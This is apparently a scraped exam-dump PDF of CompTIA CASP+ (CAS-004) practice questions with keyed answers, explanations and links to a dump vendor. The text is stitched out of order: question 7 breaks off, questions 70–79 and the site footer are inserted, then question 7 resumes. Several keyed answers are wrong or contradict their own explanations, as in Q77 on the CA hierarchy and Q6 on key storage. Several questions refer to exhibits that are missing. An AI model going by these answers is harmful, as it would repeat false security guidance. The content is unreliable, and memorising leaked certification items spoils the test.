<p>CAS-004</p><p>Exam Name: CompTIA Advanced Security Practitioner</p><p>(CASP+) Exam</p><p>Full version: 507 Q&As</p><p>Full version of CAS-004 Dumps</p><p>Share some CAS-004 exam dumps below.</p><p>1. A new, online file hosting service is being offered.</p><p>The service has the following security requirements:</p><p>• Threats to customer data integrity and availability should be remediated first.</p><p>• The environment should be dynamic to match increasing customer demands.</p><p>1 / 44</p><p>https://www.certqueen.com/CAS-004.html</p><p>• The solution should not interfere with customers" ability to access their data at anytime.</p><p>• Security analysts should focus on high-risk items.</p><p>Which of the following would BEST satisfy the requirements?</p><p>A. Expanding the use of IPS and NGFW devices throughout the environment</p><p>B. Increasing the number of analysts to Identify risks that need remediation</p><p>C. Implementing a SOAR solution to address known threats</p><p>D. Integrating enterprise threat feeds in the existing SIEM</p><p>Answer: C</p><p>Explanation:</p><p>A SOAR (Security Orchestration, Automation, and Response) solution is a software platform</p><p>that can automate the detection and response of known threats, such as ransomware, phishing,</p><p>or denial-of-service attacks. A SOAR solution can also integrate with other security tools, such</p><p>as IPS, NGFW, SIEM, and threat feeds, to provide a comprehensive and dynamic security</p><p>posture. 
A SOAR solution would best satisfy the requirements of the online file hosting service,</p><p>because it would:</p><p>Remediate threats to customer data integrity and availability first, by automatically applying</p><p>predefined actions or workflows based on the severity and type of the threat.</p><p>Allow the environment to be dynamic to match increasing customer demands, by scaling up or</p><p>down the security resources and processes as needed.</p><p>Not interfere with customers’ ability to access their data at anytime, by minimizing the human</p><p>intervention and downtime required for threat response.</p><p>Enable security analysts to focus on high-risk items, by reducing the manual tasks and alert</p><p>fatigue associated with threat detection and response.</p><p>Reference: CASP+ (Plus) CompTIA Advanced Security Practitioner Certification …</p><p>2. A PKI engineer is defining certificate templates for an organization's CA and would like to</p><p>ensure at least two of the possible SAN certificate extension fields populate for documentation</p><p>purposes.</p><p>Which of the following are explicit options within this extension? (Select two).</p><p>A. Type</p><p>B. Email</p><p>C. OCSP responder</p><p>D. Registration authority</p><p>E. Common Name</p><p>F. DNS name</p><p>Answer: BF</p><p>2 / 44</p><p>Explanation:</p><p>The SAN (Subject Alternative Name) field in a certificate can include multiple types of entries,</p><p>including DNS names and email addresses. These are explicit options within the SAN</p><p>extension, allowing a single certificate to be valid for multiple domain names and email</p><p>addresses. This is often used in multi-domain SSL certificates, where a single certificate needs</p><p>to be valid for multiple subdomains or different domain names.</p><p>3. 
Immediately following the report of a potential breach, a security engineer creates a forensic</p><p>image of the server in question as part of the organization incident response procedure.</p><p>Which of the must occur to ensure the integrity of the image?</p><p>A. The image must be password protected against changes.</p><p>B. A hash value of the image must be computed.</p><p>C. The disk containing the image must be placed in a seated container.</p><p>D. A duplicate copy of the image must be maintained</p><p>Answer: B</p><p>4. A company is implementing SSL inspection. During the next six months, multiple web</p><p>applications that will be separated out with subdomains will be deployed.</p><p>Which of the following will allow the inspection of the data without multiple certificate</p><p>deployments?</p><p>A. Include all available cipher suites.</p><p>B. Create a wildcard certificate.</p><p>C. Use a third-party CA.</p><p>D. Implement certificate pinning.</p><p>Answer: B</p><p>Explanation:</p><p>A wildcard certificate is a certificate that can be used for multiple subdomains of a domain, such</p><p>as *.example.com. This would allow the inspection of the data without multiple certificate</p><p>deployments, as one wildcard certificate can cover all the subdomains that will be separated out</p><p>with subdomains. Including all available cipher suites may not help with inspecting the data</p><p>without multiple certificate deployments, as cipher suites are used for negotiating encryption and</p><p>authentication algorithms, not for verifying certificates. 
Using a third-party CA (certificate</p><p>authority) may not help with inspecting the data without multiple certificate deployments, as a</p><p>third-party CA is an entity that issues and validates certificates, not a type of certificate.</p><p>Implementing certificate pinning may not help with inspecting the data without multiple certificate</p><p>deployments, as certificate pinning is a technique that hardcodes the expected certificate or</p><p>3 / 44</p><p>public key in the application code, not a type of certificate.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-a-wildcard-certificate</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>5. A security administrator is setting up a virtualization solution that needs to run services from a</p><p>single host. Each service should be the only one running in its environment. Each environment</p><p>needs to have its own operating system as a base but share the kernel version and properties</p><p>of the running host.</p><p>Which of the following technologies would best meet these requirements?</p><p>A. Containers</p><p>B. Type 1 hypervisor</p><p>C. Type 2 hypervisor</p><p>D. Virtual desktop infrastructure</p><p>E. Emulation</p><p>Answer: A</p><p>Explanation:</p><p>The most appropriate technology for this virtualization solution is containers. Containers allow</p><p>multiple services to run on a single host with isolated environments, while sharing the same</p><p>kernel version and properties of the host operating system. Each container has its own instance</p><p>of the operating system and runs independently from the others, meeting the requirement for</p><p>separate environments with their own OS. Containers are more lightweight than full hypervisors</p><p>and are ideal for running microservices in isolated environments. 
CASP+ emphasizes the use of</p><p>containers in scenarios where services need to be isolated but share the same host OS kernel.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 3.0 C Enterprise Security Architecture</p><p>(Virtualization Technologies, Containers)</p><p>CompTIA CASP+ Study Guide: Virtualization and Containerization for Isolated Services</p><p>6. A company publishes several APIs for customers and is required to use keys to segregate</p><p>customer data sets.</p><p>Which of the following would be BEST to use to store customer keys?</p><p>A. A trusted platform module</p><p>B. A hardware security module</p><p>C. A localized key store</p><p>D. A public key infrastructure</p><p>Answer: D</p><p>4 / 44</p><p>Explanation:</p><p>A public key infrastructure (PKI) is a system of certificates and keys that can provide encryption</p><p>and authentication for APIs (application programming interfaces). A PKI can be used to store</p><p>customer keys for accessing APIs and segregating customer data sets. A trusted platform</p><p>module (TPM) is a hardware device that provides cryptographic functions and key storage, but it</p><p>is not suitable for storing customer keys for APIs. A hardware security module (HSM) is similar</p><p>to a TPM, but it is used for storing keys for applications, not for APIs. A localized key store is a</p><p>software component that stores keys locally, but it is not as secure or scalable as a PKI.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-pki</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>7. After investigating a recent security incident, a SOC analyst is charged with creating a</p><p>reference guide for the entire team to use.</p><p>Which of the following should the analyst create to address future incidents?</p><p>A.</p><p>analysts to identify, understand, and prioritize potential threats, as well as to</p><p>develop effective detection and response strategies. 
MITRE ATT&CK covers the entire lifecycle</p><p>of a cyberattack, from initial access to impact, and provides information on how to mitigate,</p><p>detect, and hunt for each technique. It also includes threat actor profiles, software descriptions,</p><p>and data sources that can be used for threat intelligence and analysis. MITRE ATT&CK is the</p><p>most likely resource that a security analyst would adopt to implement the most up-to-date and</p><p>effective security methodologies for their clients.</p><p>Verified Reference:</p><p>https://attack.mitre.org/</p><p>https://resources.infosecinstitute.com/topic/top-threat-modeling-frameworks-stride-owasp-</p><p>top-10-mitre-attck-framework/</p><p>70. A healthcare system recently suffered from a ransomware incident As a result the board of</p><p>37 / 44</p><p>directors decided to hire a security consultant to improve existing network security. The security</p><p>consultant found that the healthcare network was completely flat, had no privileged access limits</p><p>and had open RDP access to servers with personal health information.</p><p>As the consultant builds the remediation plan, which of the following solutions would BEST</p><p>solve these challenges? (Select THREE).</p><p>A. SD-WAN</p><p>B. PAM</p><p>C. Remote access VPN</p><p>D. MFA</p><p>E. Network segmentation</p><p>F. BGP</p><p>G. NAC</p><p>Answer: A, C, E</p><p>71. An auditor needs to scan documents at rest for sensitive text. These documents contain</p><p>both text and Images.</p><p>Which of the following software functionalities must be enabled in the DLP solution for the</p><p>auditor to be able to fully read these documents? (Select TWO).</p><p>A. Document interpolation</p><p>B. Regular expression pattern matching</p><p>C. Optical character recognition functionality</p><p>D. Baseline image matching</p><p>E. Advanced rasterization</p><p>F. Watermarking</p><p>Answer: AC</p><p>72. A small company recently developed prototype technology for a military program. 
The</p><p>company’s security engineer is concerned about potential theft of the newly developed,</p><p>proprietary information.</p><p>Which of the following should the security engineer do to BEST manage the threats proactively?</p><p>A. Join an information-sharing community that is relevant to the company.</p><p>B. Leverage the MITRE ATT&CK framework to map the TTR.</p><p>C. Use OSINT techniques to evaluate and analyze the threats.</p><p>D. Update security awareness training to address new threats, such as best practices for data</p><p>security.</p><p>Answer: A</p><p>38 / 44</p><p>Explanation:</p><p>An information-sharing community is a group or network of organizations that share threat</p><p>intelligence, best practices, and mitigation strategies related to cybersecurity. An information-</p><p>sharing community can help the company proactively manage the threats of potential theft of its</p><p>newly developed, proprietary information by providing timely and actionable insights, alerts, and</p><p>recommendations. An information-sharing community can also enable collaboration and</p><p>coordination among its members to enhance their collective defense and resilience.</p><p>Reference:</p><p>https://us-cert.cisa.gov/ncas/tips/ST04-016 https://www.cisecurity.org/blog/what-is-an-</p><p>information-sharing-community/</p><p>73. A company is experiencing a large number of attempted network-based attacks against its</p><p>online store.</p><p>To determine the best course of action, a security analyst reviews the following logs.</p><p>Which of the following should the company do next to mitigate the risk of a compromise from</p><p>these attacks?</p><p>A. Restrict HTTP methods.</p><p>B. Perform parameterized queries.</p><p>C. Implement input sanitization.</p><p>D. 
Validate content types.</p><p>Answer: A</p><p>Explanation:</p><p>Restricting HTTP methods can mitigate the risk of network-based attacks against an online</p><p>store by limiting the types of HTTP requests that the server will accept, thus reducing the attack</p><p>surface. This is a common method to prevent web-based attacks such as Cross-Site Scripting</p><p>(XSS) and SQL Injection.</p><p>74. A large organization is planning to migrate from on premises to the cloud. The Chief</p><p>Information Security Officer (CISO) is concerned about security responsibilities.</p><p>If the company decides to migrate to the cloud, which of the following describes who is</p><p>responsible for the security of the new physical datacenter?</p><p>A. Third-party assessor</p><p>B. CSP</p><p>39 / 44</p><p>C. Organization</p><p>D. Shared responsibility</p><p>Answer: B</p><p>Explanation:</p><p>In cloud computing models, the security of the physical data center is the responsibility of the</p><p>Cloud Service Provider (CSP). The CSP is responsible for protecting the infrastructure that runs</p><p>all of the services offered in the cloud, which includes the physical security of the data center.</p><p>75. After installing an unapproved application on a personal device, a Chief Executive Officer</p><p>reported an incident to a security analyst. This device is not controlled by the MDM solution, as</p><p>stated in the BYOD policy. However, the device contained critical confidential information.</p><p>The cyber incident response team performed the analysis on the device and found the following</p><p>log:</p><p>Which of the following is the most likely reason for the successful attack?</p><p>A. Lack of MDM controls</p><p>B. Auto-join hotspots enabled</p><p>C. Sideloading</p><p>D. 
Lack of application segmentation</p><p>Answer: A</p><p>Explanation:</p><p>A lack of Mobile Device Management (MDM) controls can lead to successful attacks because</p><p>MDM solutions provide the ability to enforce security policies, remotely wipe sensitive data, and</p><p>manage software updates, which can prevent unauthorized access and protect corporate data.</p><p>Without MDM, personal devices are more vulnerable to security risks.</p><p>76. A company wants to quantify and communicate the effectiveness of its security controls but</p><p>must establish measures.</p><p>Which of the following is MOST likely to be included in an effective assessment roadmap for</p><p>these controls?</p><p>A. Create a change management process.</p><p>B. Establish key performance indicators.</p><p>C. Create an integrated master schedule.</p><p>D. Develop a communication plan.</p><p>40 / 44</p><p>E. Perform a security control assessment.</p><p>Answer: C</p><p>77. A security administrator has been provided with three separate certificates and is trying to</p><p>organize them into a single chain of trust to deploy on a website.</p><p>Given the following certificate properties:</p><p>Which of the following are true about the PKI hierarchy? (Select two).</p><p>A. www.budgetcert.com.is the top-level CA.</p><p>B. www.budgetcert.com. is an intermediate CA.</p><p>C. SuperTrust RSA 2018 is the top-level CA.</p><p>D. SuperTrust RSA 2018 is an intermediate CA.</p><p>E. BudgetCert is the top-level CA</p><p>F. 
BudgetCert is an intermediate CA.</p><p>Answer: C, E</p><p>Explanation:</p><p>Based on the given certificate properties:</p><p>SuperTrust RSA 2018 is an intermediate certificate authority (CA) because it is issued by</p><p>BudgetCert Global Root CA, which is the top-level certificate authority.</p><p>BudgetCert is the top-level CA (root CA) in this public key infrastructure (PKI) hierarchy, as it</p><p>issues certificates to SuperTrust RSA 2018 and has no issuer of its own.</p><p>Therefore, SuperTrust RSA 2018 is the intermediate CA, and BudgetCert is the top-level (root)</p><p>CA in</p><p>this PKI chain of trust. The www.budgetcert.com certificate is the leaf or end-entity certificate,</p><p>which</p><p>is used for the website itself.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 3.0 C Enterprise Security Architecture</p><p>(PKI and Certificate Chains of Trust)</p><p>41 / 44</p><p>CompTIA CASP+ Study Guide: PKI Hierarchy and Certificate Trust Models</p><p>78. A new web server must comply with new secure-by-design principles and PCI DSS. This</p><p>includes mitigating the risk of an on-path attack.</p><p>A security analyst is reviewing the following web server configuration:</p><p>Which of the following ciphers should the security analyst remove to support the business</p><p>requirements?</p><p>A. TLS_AES_128_CCM_8_SHA256</p><p>B. TLS_DHE_DSS_WITH_RC4_128_SHA</p><p>C. TLS_CHACHA20_POLY1305_SHA256</p><p>D. TLS_AES_128_GCM_SHA256</p><p>Answer: B</p><p>Explanation:</p><p>The security analyst should remove the cipher TLS_DHE_DSS_WITH_RC4_128_SHA to</p><p>support the business requirements, as it is considered weak and vulnerable to on-path attacks.</p><p>RC4 is an outdated stream cipher that has been deprecated by major browsers and protocols</p><p>due to its flaws and weaknesses. 
The other ciphers are more secure and compliant with secure-</p><p>by-design principles and PCI DSS.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-a-cipher</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>79. A security consultant needs to set up wireless security for a small office that does not have</p><p>42 / 44</p><p>Active Directory. Despite the lack of central account management, the office manager wants to</p><p>ensure a high level of defense to prevent brute-force attacks against wireless authentication.</p><p>Which of the following technologies would BEST meet this need?</p><p>A. Faraday cage</p><p>B. WPA2 PSK</p><p>C. WPA3 SAE</p><p>D. WEP 128 bit</p><p>Answer: C</p><p>Explanation:</p><p>WPA3 SAE prevents brute-force attacks.</p><p>“WPA3 Personal (WPA-3 SAE) Mode is a static passphrase-based method. It provides better</p><p>security than what WPA2 previously provided, even when a non-complex password is used,</p><p>thanks to Simultaneous Authentication of Equals (SAE), the personal authentication process of</p><p>WPA3.”</p><p>More Hot Exams are available.</p><p>43 / 44</p><p>https://www.certqueen.com/promotion.asp</p><p>350-401 ENCOR Exam Dumps</p><p>350-801 CLCOR Exam Dumps</p><p>200-301 CCNA Exam Dumps</p><p>Powered by TCPDF (www.tcpdf.org)</p><p>44 / 44</p><p>https://www.certqueen.com/350-401.html</p><p>https://www.certqueen.com/350-801.html</p><p>https://www.certqueen.com/200-301.html</p><p>http://www.tcpdf.org</p><p>Root cause analysis</p><p>B. Communication plan</p><p>C. Runbook</p><p>D. Lessons learned</p><p>Answer: C</p><p>Explanation:</p><p>A runbook is a detailed guide that provides step-by-step instructions on how to respond to</p><p>specific types of incidents. It is used by the SOC team to ensure a consistent, organized, and</p><p>efficient response to incidents. 
In this case, after the incident investigation, creating a runbook</p><p>would help standardize the response process for future security incidents, enabling the team to</p><p>act quickly and effectively. CASP+ emphasizes the importance of having detailed runbooks for</p><p>incident response as part of an organization's overall incident response strategy.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 C Enterprise Security Operations</p><p>(Incident Response and Runbooks)</p><p>CompTIA CASP+ Study Guide: Incident Response Procedures and Runbooks</p><p>8. A senior security analyst is helping the development team improve the security of an</p><p>application that is being developed. The developers use third-party libraries and applications.</p><p>The software in development used old, third-party packages that were not replaced before</p><p>market distribution.</p><p>Which of the following should be implemented into the SDLC to resolve the issue?</p><p>5 / 44</p><p>A. Software composition analysis</p><p>B. A SCAP scanner</p><p>C. ASAST</p><p>D. A DAST</p><p>Answer: A</p><p>Explanation:</p><p>Software Composition Analysis (SCA) is a process that identifies the open-source components</p><p>used in software development to manage the risks associated with third-party components.</p><p>Implementing SCA into the Software Development Life Cycle (SDLC) can help identify outdated</p><p>third-party packages and ensure they are replaced or updated before the software is distributed.</p><p>9. A company is looking to fortify its cybersecurity defenses and is focusing on its network</p><p>infrastructure. The solution cannot affect the availability of the company’s services to ensure</p><p>false positives do not drop legitimate traffic.</p><p>Which of the following would satisfy the requirement?</p><p>A. NIDS</p><p>B. NIPS</p><p>C. WAF</p><p>D. 
Reverse proxy</p><p>Answer: A</p><p>Explanation:</p><p>Reference:</p><p>https://subscription.packtpub.com/book/networking-and-</p><p>servers/9781782174905/5/ch05lvl1sec38/differentiating-between-nids-and-nips</p><p>https://owasp.org/www-community/controls/Intrusion_Detection</p><p>A NIDS (Network Intrusion Detection System) is a security solution that monitors network traffic</p><p>for signs of malicious activity, such as attacks, intrusions, or policy violations. A NIDS does not</p><p>affect the availability of the company’s services because it operates in passive mode, which</p><p>means it does not block or modify traffic. Instead, it alerts the network administrator or other</p><p>security tools when it detects an anomaly or threat.</p><p>Reference:</p><p>https://www.cisco.com/c/en/us/products/security/what-is-network-intrusion-detection-</p><p>system.html</p><p>https://www.imperva.com/learn/application-security/network-intrusion-detection-system-nids/</p><p>10. Ransomware encrypted the entire human resources fileshare for a large financial institution.</p><p>6 / 44</p><p>Security operations personnel were unaware of the activity until it was too late to stop it. The</p><p>restoration will take approximately four hours, and the last backup occurred 48 hours ago. The</p><p>management team has indicated that the RPO for a disaster recovery event for this data</p><p>classification is 24 hours.</p><p>Based on RPO requirements, which of the following recommendations should the management</p><p>team make?</p><p>A. Leave the current backup schedule intact and pay the ransom to decrypt the data.</p><p>B. Leave the current backup schedule intact and make the human resources fileshare read-</p><p>only.</p><p>C. Increase the frequency of backups and create SIEM alerts for IOCs.</p><p>D. 
Decrease the frequency of backups and pay the ransom to decrypt the data.</p><p>Answer: C</p><p>Explanation:</p><p>Increasing the frequency of backups and creating SIEM (security information and event</p><p>management) alerts for IOCs (indicators of compromise) are the best recommendations that the</p><p>management team can make based on RPO (recovery point objective) requirements. RPO is a</p><p>metric that defines the maximum acceptable amount of data loss that can occur during a</p><p>disaster recovery event. Increasing the frequency of backups can reduce the amount of data</p><p>loss that can occur, as it can create more recent copies or snapshots of the data. Creating</p><p>SIEM alerts for IOCs can help detect and respond to ransomware attacks, as it can collect,</p><p>correlate, and analyze security events and data from various sources and generate alerts based</p><p>on predefined rules or thresholds. Leaving the current backup schedule intact and paying the</p><p>ransom to decrypt the data are not good recommendations, as they could result in more data</p><p>loss than the RPO allows, as well as encourage more ransomware attacks or expose the</p><p>company to legal or ethical issues. Leaving the current backup schedule intact and making the</p><p>human resources fileshare read-only are not good recommendations, as they could result in</p><p>more data loss than the RPO allows, as well as affect the normal operations or functionality of</p><p>the fileshare. Decreasing the frequency of backups and paying the ransom to decrypt the data</p><p>are not good recommendations, as they could result in more data loss than the RPO allows, as</p><p>well as increase the risk of losing data due to less frequent backups or unreliable decryption.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-rpo</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>11. 
A security researcher detonated some malware in a lab environment and identified the</p><p>following commands running from the EDR tool:</p><p>7 / 44</p><p>With which of the following MITRE ATT&CK TTPs is the command associated? (Select TWO).</p><p>A. Indirect command execution</p><p>B. OS credential dumping</p><p>C. Inhibit system recovery</p><p>D. External remote services</p><p>E. System information discovery</p><p>F. Network denial of service</p><p>Answer: BE</p><p>Explanation:</p><p>OS credential dumping is the process of obtaining account login and password information,</p><p>normally in the form of a hash or a clear text password, from the operating system and software.</p><p>System information discovery is the process of gathering information about the system, such as</p><p>hostname, IP address, OS version, running processes, etc. Both of these techniques are</p><p>commonly used by adversaries to gain access to sensitive data and resources on the target</p><p>system. The command shown in the image is using Mimikatz, a tool that can dump credentials</p><p>from memory, and also querying the system information using WMIC.</p><p>Verified Reference:</p><p>https://attack.mitre.org/techniques/T1003/</p><p>https://attack.mitre.org/techniques/T1082/</p><p>https://github.com/gentilkiwi/mimikatz https://docs.microsoft.com/en-</p><p>us/windows/win32/wmisdk/wmic</p><p>12. A security analyst is participating in a risk assessment and is helping to calculate the</p><p>exposure factor associated with various systems and processes within the organization.</p><p>Which of the following resources would be most useful to calculate the exposure factor in this</p><p>scenario?</p><p>A. Gap analysis</p><p>B. Business impact analysis</p><p>C. Risk register</p><p>D. Information security policy</p><p>E. 
Lessons learned</p><p>Answer: B</p><p>8 / 44</p><p>Explanation:</p><p>A business impact analysis (BIA) is the most useful resource for calculating the exposure factor</p><p>in a risk assessment. The BIA helps identify the criticality of systems and processes and</p><p>quantifies the potential financial and operational impact of vulnerabilities being exploited. By</p><p>understanding the business impact, the security team can more accurately determine the</p><p>exposure factor, which is the proportion of an asset's value that is at risk in the event of a</p><p>security incident. CASP+ highlights the role of BIAs in understanding risk exposure and</p><p>supporting effective risk management decisions.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 C Risk Management (Business</p><p>Impact</p><p>Analysis and Risk Exposure)</p><p>CompTIA CASP+ Study Guide: Business Impact Analysis for Risk Assessment</p><p>13. An organization established an agreement with a partner company for specialized help desk</p><p>services. A senior security officer within the organization Is tasked with providing documentation</p><p>required to set up a dedicated VPN between the two entities.</p><p>Which of the following should be required?</p><p>A. SLA</p><p>B. ISA</p><p>C. NDA</p><p>D. MOU</p><p>Answer: B</p><p>Explanation:</p><p>An ISA, or interconnection security agreement, is a document that should be required to set up</p><p>a dedicated VPN between two entities that provide specialized help desk services. An ISA</p><p>defines the technical and security requirements for establishing, operating, and maintaining a</p><p>secure connection between two or more organizations. 
An ISA also specifies the roles and</p><p>responsibilities of each party, the security controls and policies to be implemented, the data</p><p>types and classifications to be exchanged, and the incident response procedures to be followed.</p><p>Reference: [CompTIA CASP+ Study Guide, Second Edition, page 36]</p><p>14. A security engineer is creating a single CSR for the following web server hostnames:</p><p>• wwwint internal</p><p>• www company com</p><p>• home.internal</p><p>• www internal</p><p>Which of the following would meet the requirement?</p><p>9 / 44</p><p>A. SAN</p><p>B. CN</p><p>C. CA</p><p>D. CRL</p><p>E. Issuer</p><p>Answer: A</p><p>Explanation:</p><p>Subject Alternative Name (SAN) is a part of the X.509 specification for SSL certificates that</p><p>allows multiple domain names to be protected under a single SSL certificate. Using SAN is the</p><p>most suitable option when a single Certificate Signing Request (CSR) needs to cover multiple</p><p>hostnames. It enables the security engineer to list all the required hostnames in one certificate,</p><p>ensuring secure communications for each listed entity without the need for separate certificates.</p><p>15. An organization’s assessment of a third-party, non-critical vendor reveals that the vendor</p><p>does not have cybersecurity insurance and IT staff turnover is high. The organization uses the</p><p>vendor to move customer office equipment from one service location to another. The vendor</p><p>acquires customer data and access to the business via an API.</p><p>Given this information, which of the following is a noted risk?</p><p>A. Feature delay due to extended software development cycles</p><p>B. Financial liability from a vendor data breach</p><p>C. Technical impact to the API configuration</p><p>D. The possibility of the vendor’s business ceasing operations</p><p>Answer: A</p><p>Explanation:</p><p>Reference: https://legal.thomsonreuters.com/en/insights/articles/data-breach-liability</p><p>16. 
A systems administrator is preparing to run a vulnerability scan on a set of information</p><p>systems in the organization. The systems administrator wants to ensure that the targeted</p><p>systems produce accurate information especially regarding configuration settings.</p><p>Which of the following scan types will provide the systems administrator with the MOST</p><p>accurate information?</p><p>A. A passive, credentialed scan</p><p>B. A passive, non-credentialed scan</p><p>C. An active, non-credentialed scan</p><p>D. An active, credentialed scan</p><p>Answer: D</p><p>10 / 44</p><p>17. A common industrial protocol has the following characteristics:</p><p>• Provides for no authentication/security</p><p>• Is often implemented in a client/server relationship</p><p>• Is implemented as either RTU or TCP/IP</p><p>Which of the following is being described?</p><p>A. Profinet</p><p>B. Modbus</p><p>C. Zigbee</p><p>D. Z-Wave</p><p>Answer: B</p><p>Explanation:</p><p>The protocol described is Modbus, which is a commonly used industrial protocol that lacks built-</p><p>in authentication and security features. Modbus operates in a client/server model and can be</p><p>implemented over RTU (Remote Terminal Unit) or TCP/IP for communication between devices.</p><p>The other protocols mentioned either have different characteristics or are used in different</p><p>contexts (such as Profinet for industrial automation, Zigbee for wireless IoT devices, and Z-</p><p>Wave for home automation). CASP+ identifies Modbus as a critical protocol in industrial</p><p>environments that lacks security and requires additional protective measures.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 4.0 C Industrial Control Systems (ICS)</p><p>and Modbus Protocol</p><p>CompTIA CASP+ Study Guide: Industrial Protocols and Modbus Security</p><p>18. 
A control systems analyst is reviewing the defensive posture of engineering workstations on the shop floor.</p><p>Upon evaluation, the analyst makes the following observations:</p><p>• Unsupported, end-of-life operating systems were still prevalent on the shop floor.</p><p>• There are no security controls for systems with supported operating systems.</p><p>• There is little uniformity of installed software among the workstations.</p><p>Which of the following would have the greatest impact on the attack surface?</p><p>A. Deploy antivirus software to all of the workstations.</p><p>B. Increase the level of monitoring on the workstations.</p><p>C. Utilize network-based allow and block lists.</p><p>D. Harden all of the engineering workstations using a common strategy.</p><p>Answer: D</p><p>Explanation:</p><p>Hardening the engineering workstations using a consistent strategy would have the greatest impact on the attack surface. The workstations run outdated and unsupported operating systems, have no security controls, and carry inconsistent software installations, all of which multiply the opportunities for exploitation. Hardening means patching or replacing unsupported systems, removing unnecessary software, disabling unused services, and applying uniform security controls to every workstation from a common baseline. Antivirus, monitoring, and network lists each address one symptom; only a standardized hardening strategy removes the exposed services and inconsistent configurations that make up the attack surface, which aligns with CASP+ guidance on reducing attack surfaces by standardizing and securing endpoint configurations.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 - Risk Management (Vulnerability Management, System Hardening)</p><p>CompTIA CASP+ Study Guide: Hardening Techniques and Attack Surface Reduction</p><p>19. A company’s product site recently had failed API calls, resulting in customers being unable to check out and purchase products. 
This type of failure could lead to the loss of customers and damage to the company’s reputation in the market.</p><p>Which of the following should the company implement to address the risk of system unavailability?</p><p>A. User and entity behavior analytics</p><p>B. Redundant reporting systems</p><p>C. A self-healing system</p><p>D. Application controls</p><p>Answer: D</p><p>20. Which of the following indicates when a company might not be viable after a disaster?</p><p>A. Maximum tolerable downtime</p><p>B. Recovery time objective</p><p>C. Mean time to recovery</p><p>D. Annual loss expectancy</p><p>Answer: A</p><p>Explanation:</p><p>The indicator that shows when a company might not be viable after a disaster is the maximum tolerable downtime (MTD). MTD is the maximum amount of time that a business process or function can be disrupted without causing unacceptable consequences for the organization. MTD is a key metric for business continuity planning and disaster recovery, because it bounds the recovery time objective (RTO), which must be set shorter than the MTD, and informs the recovery point objective (RPO) for each process or function. If the actual downtime exceeds the MTD, the organization may face severe losses, reputational damage, regulatory penalties, or even bankruptcy.</p><p>Verified Reference:</p><p>https://www.techtarget.com/searchdisasterrecovery/definition/maximum-tolerable-downtime</p><p>https://www.techtarget.com/searchdisasterrecovery/definition/recovery-time-objective</p><p>https://www.techtarget.com/searchdisasterrecovery/definition/recovery-point-objective</p><p>21. An organization recently started processing, transmitting, and storing its customers’ credit card information. 
Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers’ information.</p><p>Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit?</p><p>A. NIST</p><p>B. GDPR</p><p>C. PCI DSS</p><p>D. ISO</p><p>Answer: C</p><p>Explanation:</p><p>PCI DSS (Payment Card Industry Data Security Standard) provides the best guidance for protecting credit card information while it is at rest and in transit. PCI DSS defines the security requirements and best practices for organizations that process, store, or transmit cardholder data, such as merchants, service providers, and acquirers, including the requirements to render the primary account number unreadable wherever it is stored and to protect it with strong cryptography when it is transmitted over open, public networks. PCI DSS aims to protect the confidentiality, integrity, and availability of credit card information and to prevent fraud or identity theft. NIST (National Institute of Standards and Technology) is not a standard but an agency that develops standards, guidelines, and recommendations for various fields of science and technology, including cybersecurity; its publications are general rather than specific to cardholder data. GDPR (General Data Protection Regulation) is not a standard but a regulation that defines the data protection and privacy rights and obligations for individuals and organizations in the European Union or the European Economic Area. 
ISO (International Organization for Standardization) is not a standard but an organization that develops standards for various fields of science and technology, including information security.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-pci-dss</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>22. The security analyst discovers a new device on the company’s dedicated IoT subnet during the most recent vulnerability scan. The scan results show numerous open ports and insecure protocols in addition to default usernames and passwords. A camera needs to transmit video to the security server in the IoT subnet.</p><p>Which of the following should the security analyst recommend to securely operate the camera?</p><p>A. Harden the camera configuration.</p><p>B. Send camera logs to the SIEM.</p><p>C. Encrypt the camera's video stream.</p><p>D. Place the camera on an isolated segment.</p><p>Answer: A</p><p>Explanation:</p><p>To securely operate the camera, the security analyst should recommend hardening the camera configuration. This involves several steps:</p><p>Changing default credentials: Default usernames and passwords are a common vulnerability. They should be replaced with strong, unique passwords.</p><p>Disabling unnecessary services and ports: The numerous open ports and insecure protocols should be reviewed, and any unnecessary services should be disabled to reduce the attack surface.</p><p>Firmware updates: Ensuring the camera's firmware is up to date will mitigate known vulnerabilities. 
</p><p>Enabling encryption: If possible, enable encryption for data in transit and at rest to protect the video stream and other communications from interception.</p><p>This approach addresses the identified vulnerabilities directly and ensures that the device is more secure. Simply sending logs to the SIEM or isolating the camera would not fully mitigate the risks associated with default settings and open ports.</p><p>Reference: CompTIA CASP+ CAS-004 Exam Objectives: Section 2.4: Implement security activities across the technology life cycle.</p><p>CompTIA CASP+ Study Guide, Chapter 5: Implementing Host Security.</p><p>23. An organization's finance system was recently attacked. A forensic analyst is reviewing the contents of the compromised files for credit card data.</p><p>Which of the following commands should the analyst run to BEST determine whether financial data was lost?</p><p>A. Option A</p><p>B. Option B</p><p>C. Option C</p><p>D. Option D</p><p>Answer: C</p><p>24. The Chief Information Security Officer (CISO) asked a security manager to set up a system that sends an alert whenever a mobile device enters a sensitive area of the company's data center. The CISO would also like to be able to alert the individual who is entering the area that the access was logged and monitored.</p><p>Which of the following would meet these requirements?</p><p>A. Near-field communication</p><p>B. Short Message Service</p><p>C. Geofencing</p><p>D. Bluetooth</p><p>Answer: C</p><p>Explanation:</p><p>Geofencing is a location-based service that allows an organization to define and enforce a virtual boundary around a sensitive area, such as a data center. Geofencing can use various technologies, such as GPS, Wi-Fi, cellular data, or RFID, to detect when a mobile device enters or exits the geofence. 
